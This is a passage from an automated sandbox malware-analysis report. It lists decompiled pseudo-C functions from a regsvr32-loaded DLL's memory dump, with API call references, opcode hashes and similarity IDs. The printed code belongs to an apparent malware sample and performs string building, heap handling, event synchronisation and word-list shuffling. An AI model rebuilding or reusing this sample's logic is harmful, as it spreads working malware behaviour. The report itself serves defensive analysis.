                • Opcode ID: ce14d8e0eeac8cacb2dc04adaad9609a9924848e502d14fb007de83a89f2339d
                • Instruction ID: 143b119e97f1fd008263b9ef734c498bee7563fd047616544d88e63bcf5871ec
                • Opcode Fuzzy Hash: ce14d8e0eeac8cacb2dc04adaad9609a9924848e502d14fb007de83a89f2339d
                • Instruction Fuzzy Hash: 9D51297A10060AFFDB16EF60DC44EAA7BBAEF0C310F148924FA1996160D735D9659F60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F7253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E031F7253(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x31fa2d8; // 0x240d5a8
				_t2 = _t22 + 0x31fb682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x31fa3a0; // 0x5609b20
				_push(0x800);
				_push(0);
				_push( *0x31fa290);
				if( *0x31fa2a4 >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x31fa2a4 =  *0x31fa2a4 + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E031F6576(_t52, _t50); // executed
						_t30 = E031F4F81(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x31fa2a4 < 5) {
								 *0x31fa2a4 =  *0x31fa2a4 & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E031F51B1();
						HeapFree( *0x31fa290, 0, _t50);
						goto L10;
					}
					_t37 = E031F74A5(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t37 = E031F4062(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38);
				goto L5;
			}
















                0x031f7253
                0x031f7253
                0x031f725a
                0x031f7261
                0x031f7265
                0x031f726a
                0x031f7275
                0x031f727b
                0x031f728b
                0x031f7290
                0x031f7292
                0x031f7298
                0x031f72bc
                0x031f72c4
                0x031f72e1
                0x031f72e1
                0x031f72e8
                0x031f72ec
                0x031f7326
                0x031f7326
                0x031f732c
                0x031f7333
                0x031f7333
                0x031f72ee
                0x031f72f1
                0x031f72f3
                0x031f7300
                0x031f7302
                0x031f7309
                0x031f7340
                0x031f7345
                0x031f7347
                0x031f7349
                0x031f7349
                0x00000000
                0x031f7347
                0x031f730b
                0x031f7312
                0x031f7320
                0x00000000
                0x031f7320
                0x031f72d7
                0x031f72dc
                0x031f72dc
                0x00000000
                0x031f72dc
                0x031f72a2
                0x00000000
                0x00000000
                0x031f72b5
                0x00000000

                APIs
                • wsprintfA.USER32 ref: 031F7275
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F729A
                  • Part of subcall function 031F4062: GetTickCount.KERNEL32 ref: 031F4076
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F40C6
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F40E3
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F4103
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F412F
                  • Part of subcall function 031F4062: HeapFree.KERNEL32(00000000,00000000), ref: 031F4141
                  • Part of subcall function 031F4062: wsprintfA.USER32 ref: 031F4162
                  • Part of subcall function 031F4062: HeapFree.KERNEL32(00000000,00000000), ref: 031F4172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F72BC
                • HeapFree.KERNEL32(00000000,?,?), ref: 031F7320
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$Allocate$CountTick
                • String ID: Ut
                • API String ID: 1428766365-8415677
                • Opcode ID: b839e40b71dc505b0cad6b468e2a62a2448ca102e4f8d1981db3533d2c82d1e8
                • Instruction ID: c6e459f2097473c9749b3b82d55ec1827bb4c491b1c092fd250595ca4f9b78d0
                • Opcode Fuzzy Hash: b839e40b71dc505b0cad6b468e2a62a2448ca102e4f8d1981db3533d2c82d1e8
                • Instruction Fuzzy Hash: 4D31F675600219AFDB05EF64D984A9A7BBCFF0D394F144016FA0AEB244DB34E594CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F219A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E031F219A(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x31fa384; // 0x56095b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x31fa384; // 0x56095b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x31fa004) {
					HeapFree( *0x31fa290, 0, _t8);
				}
				_t9 = E031F1590(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x31fa384; // 0x56095b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                0x031f219a
                0x031f219a
                0x031f21a3
                0x031f21b3
                0x031f21b3
                0x031f21b8
                0x031f21bd
                0x00000000
                0x00000000
                0x031f21ad
                0x031f21ad
                0x031f21bf
                0x031f21c3
                0x031f21d5
                0x031f21d5
                0x031f21e0
                0x031f21e5
                0x031f21e8
                0x031f21ed
                0x031f21f1
                0x031f21f7

                APIs
                • RtlEnterCriticalSection.NTDLL(05609570), ref: 031F21A3
                • Sleep.KERNEL32(0000000A), ref: 031F21AD
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F21D5
                • RtlLeaveCriticalSection.NTDLL(05609570), ref: 031F21F1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 5990163c10ee26d4135f1073c056614bc38b0ecaa8f46410eaa3844d34fb40a4
                • Instruction ID: 1f3c96dcf4837ffdb49bc8471d0870c2a4df6e06ffe099c9c2bb830ac668be66
                • Opcode Fuzzy Hash: 5990163c10ee26d4135f1073c056614bc38b0ecaa8f46410eaa3844d34fb40a4
                • Instruction Fuzzy Hash: 00F0F875204240AFE728FB28E958F167BA8EF0D740B094814FA0ED6664D739D8D1CF29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F34A2 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 57%
                			E031F34A2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E031F3B98();
				if(_t21 != 0) {
					_t59 =  *0x31fa2b4; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x31fa2b4 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x31fa148(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E031F5AAB( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x31fa2d8; // 0x240d5a8
					if( *0x31fa2b4 > 5) {
						_t8 = _t26 + 0x31fb5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x31fb9f9; // 0x44283a44
						_t27 = _t7;
					}
					E031F6CD7(_t27, _t27);
					_t31 = E031F30FD(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x31fa2c8 =  *0x31fa2c8 ^ 0x81bbe65d;
						_t32 = E031F2114(0x60);
						__eflags = _t32;
						 *0x31fa384 = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x31fa384; // 0x56095b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x31fa384; // 0x56095b0
							 *_t51 = 0x31fb823;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x31fa290, 0, 0x43);
							__eflags = _t36;
							 *0x31fa320 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x31fa2b4; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x31fa2d8; // 0x240d5a8
								_t13 = _t58 + 0x31fb55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x31f92ab);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E031F5F8B( ~_v8 &  *0x31fa2c8, 0x31fa010); // executed
								_t42 = E031F4BB3(0, _t55, _t63, 0x31fa010); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E031F33AC(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E031F541F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E031F1E0F(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x31fa14c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E031F6096(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                0x031f34a2
                0x031f34ac
                0x031f34af
                0x031f34b2
                0x031f34b5
                0x031f34bc
                0x031f34be
                0x031f34ca
                0x031f34cc
                0x031f34cc
                0x031f34d5
                0x031f34dd
                0x031f34e0
                0x031f34fa
                0x031f3506
                0x031f3508
                0x031f350d
                0x031f3517
                0x031f3517
                0x031f350f
                0x031f350f
                0x031f350f
                0x031f350f
                0x031f351e
                0x031f352b
                0x031f3532
                0x031f3537
                0x031f3537
                0x031f3540
                0x031f3543
                0x031f3569
                0x031f3575
                0x031f357a
                0x031f357c
                0x031f3581
                0x031f35ad
                0x031f35af
                0x031f3583
                0x031f3587
                0x031f358c
                0x031f3591
                0x031f3598
                0x031f359e
                0x031f35a3
                0x031f35a9
                0x031f35b0
                0x031f35b2
                0x031f35b4
                0x031f35c3
                0x031f35c9
                0x031f35cb
                0x031f35d0
                0x031f3600
                0x031f3602
                0x031f35d2
                0x031f35d2
                0x031f35d8
                0x031f35e5
                0x031f35eb
                0x031f35eb
                0x031f35f3
                0x031f35fc
                0x031f3603
                0x031f3605
                0x031f3607
                0x031f360e
                0x031f361b
                0x031f3620
                0x031f3625
                0x031f3627
                0x031f3629
                0x00000000
                0x00000000
                0x031f362b
                0x031f3630
                0x031f3632
                0x031f3639
                0x031f363d
                0x031f3640
                0x031f3655
                0x031f3659
                0x031f365e
                0x00000000
                0x031f365e
                0x031f3642
                0x031f3644
                0x00000000
                0x00000000
                0x031f364f
                0x031f3651
                0x031f3653
                0x00000000
                0x00000000
                0x00000000
                0x031f3653
                0x031f3636
                0x031f3636
                0x031f3607
                0x031f3545
                0x031f3545
                0x031f354a
                0x031f3660
                0x031f3665
                0x031f366d
                0x031f366d
                0x00000000
                0x031f3665
                0x031f3550
                0x031f3553
                0x031f355d
                0x031f3564
                0x00000000
                0x031f3675
                0x031f3675
                0x031f3678
                0x031f367c
                0x031f367c

                APIs
                  • Part of subcall function 031F3B98: GetModuleHandleA.KERNEL32(4C44544E,00000000,031F34BA,00000001), ref: 031F3BA7
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 031F3537
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • memset.NTDLL ref: 031F3587
                • RtlInitializeCriticalSection.NTDLL(05609570), ref: 031F3598
                  • Part of subcall function 031F1E0F: memset.NTDLL ref: 031F1E29
                  • Part of subcall function 031F1E0F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 031F1E6F
                  • Part of subcall function 031F1E0F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 031F1E7A
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 031F35C3
                • wsprintfA.USER32 ref: 031F35F3
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                • String ID:
                • API String ID: 4246211962-0
                • Opcode ID: 5bdeec22c0df2c068df4aae5d290acba7474bd4419ce2cb3336b96b05aace3e4
                • Instruction ID: b97aea7d283711a786d36df861b2d77a6f604ade0a37744bc57066c65766aed3
                • Opcode Fuzzy Hash: 5bdeec22c0df2c068df4aae5d290acba7474bd4419ce2cb3336b96b05aace3e4
                • Instruction Fuzzy Hash: DF51F679B04214AFDB55FBA8D884F6E77A8EF0C750F180865E715DB244E778D6808FA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F284F Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E031F284F(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E031F2114(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E031F2C11(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E031F2114((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x31fa2d0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                0x031f2856
                0x031f285d
                0x031f2862
                0x031f2865
                0x031f286c
                0x031f286f
                0x031f2872
                0x031f2879
                0x031f287c
                0x031f29d0
                0x031f29d2
                0x031f29d4
                0x031f29d9
                0x031f29d9
                0x031f2882
                0x031f2885
                0x031f2888
                0x031f288a
                0x031f288a
                0x031f288e
                0x00000000
                0x00000000
                0x031f2892
                0x031f28be
                0x031f28c3
                0x031f28c5
                0x031f28c5
                0x031f28c8
                0x031f28cb
                0x031f28cb
                0x031f28cd
                0x00000000
                0x031f2898
                0x031f289a
                0x031f28b9
                0x031f28b9
                0x031f28d0
                0x031f28d0
                0x031f28d1
                0x031f28d1
                0x031f28d4
                0x00000000
                0x00000000
                0x00000000
                0x031f28d4
                0x031f289e
                0x031f28e5
                0x031f28e9
                0x031f29c3
                0x031f29c5
                0x031f29c5
                0x031f29c6
                0x031f29c9
                0x00000000
                0x031f29c9
                0x031f28f2
                0x031f2903
                0x031f2907
                0x031f29bf
                0x00000000
                0x031f29bf
                0x031f290d
                0x031f2910
                0x031f2914
                0x031f291a
                0x031f291d
                0x031f29b5
                0x031f29b5
                0x00000000
                0x031f29bb
                0x031f2928
                0x031f2931
                0x031f2945
                0x031f294c
                0x031f2961
                0x031f2967
                0x031f296f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x031f2971
                0x031f2971
                0x031f2971
                0x031f2978
                0x031f2980
                0x00000000
                0x00000000
                0x031f2982
                0x031f298b
                0x00000000
                0x00000000
                0x00000000
                0x031f298d
                0x031f298f
                0x031f2992
                0x031f2992
                0x031f2995
                0x031f2999
                0x031f299c
                0x031f29a2
                0x031f29a5
                0x031f29ac
                0x00000000
                0x031f2928
                0x031f28a3
                0x031f28ae
                0x031f28b1
                0x031f28b3
                0x031f28b3
                0x031f28b6
                0x031f28b8
                0x00000000
                0x031f28b8
                0x031f2892
                0x031f28d8
                0x031f28dd
                0x031f28df
                0x031f28df
                0x031f28e2
                0x031f28e2
                0x00000000

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 031F294C
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 031F2961
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 031F2978
                • lstrlen.KERNEL32(69B25F45), ref: 031F299C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 025cf159b337dcfadfe680d10256fb59430d144f8f97df70dabfefbcf39f353d
                • Instruction ID: e9845fec5cfbe77c9a31215dac121fab8d839aada0501aac106ee1395db922b0
                • Opcode Fuzzy Hash: 025cf159b337dcfadfe680d10256fb59430d144f8f97df70dabfefbcf39f353d
                • Instruction Fuzzy Hash: FF51B339A00218EFDF25DF99C4846ADFBB5FF49310F19885AEA559B205C7709642CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F57E8 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F57E8(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x31fa2c8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x31fa2d8; // 0x240d5a8
				_t3 = _t8 + 0x31fb876; // 0x61636f4c
				_t25 = 0;
				_t30 = E031F3FEB(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x31fa304, 1, 0, _t30);
					E031F2C11(_t30);
				}
				_t12 =  *0x31fa2b4; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E031F1212(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E031F2130(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E031F6096(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}


















                0x031f57e9
                0x031f57f0
                0x031f57fa
                0x031f57fe
                0x031f5804
                0x031f5813
                0x031f581a
                0x031f581e
                0x031f5830
                0x031f5832
                0x031f5832
                0x031f5837
                0x031f583e
                0x031f5893
                0x031f5893
                0x031f5899
                0x031f589b
                0x031f589b
                0x031f58a0
                0x031f58a5
                0x031f58a9
                0x031f58bb
                0x031f58bb
                0x031f58bf
                0x031f58c5
                0x031f58c5
                0x00000000
                0x031f584e
                0x031f584e
                0x031f5855
                0x00000000
                0x00000000
                0x031f585c
                0x031f5864
                0x031f5866
                0x031f586a
                0x031f586a
                0x031f5872
                0x031f5877
                0x031f587b
                0x031f587f
                0x031f58d4
                0x031f58da
                0x031f58da
                0x031f588d
                0x031f5891
                0x031f58c8
                0x031f58ca
                0x031f58cd
                0x031f58cd
                0x00000000
                0x031f58ca
                0x031f5891
                0x00000000
                0x031f587b

                APIs
                  • Part of subcall function 031F3FEB: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05609B30,00000000,?,?,69B25F44,00000005,031FA010,4D283A53,?,?), ref: 031F4021
                  • Part of subcall function 031F3FEB: lstrcpy.KERNEL32(00000000,00000000), ref: 031F4045
                  • Part of subcall function 031F3FEB: lstrcat.KERNEL32(00000000,00000000), ref: 031F404D
                • CreateEventA.KERNEL32(031FA304,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F5829
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • StrChrW.SHLWAPI(031F61CB,00000020,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F585C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,031F61CB,00000000,00000000,?,00000000,?,031F61CB,?,?,?), ref: 031F5887
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F58B5
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,031F61CB,?,?,?), ref: 031F58CD
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 0523e2859ced926530c8cd0ce97d98898210d7e96d1f1e7e6f2bfe6b37718e05
                • Instruction ID: ee375fe5ad04fa5715971b4a08caa7b3fd88b8de0a1f574edf033ed40799057c
                • Opcode Fuzzy Hash: 0523e2859ced926530c8cd0ce97d98898210d7e96d1f1e7e6f2bfe6b37718e05
                • Instruction Fuzzy Hash: 4921F8326407156FC731EAAA9C84A6BB3AEEF8EA10F1D0625FF46DB104DB71C8414B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCBC31 Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCD0E6: RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                  • Part of subcall function 04BCD0E6: lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                • RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                • RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
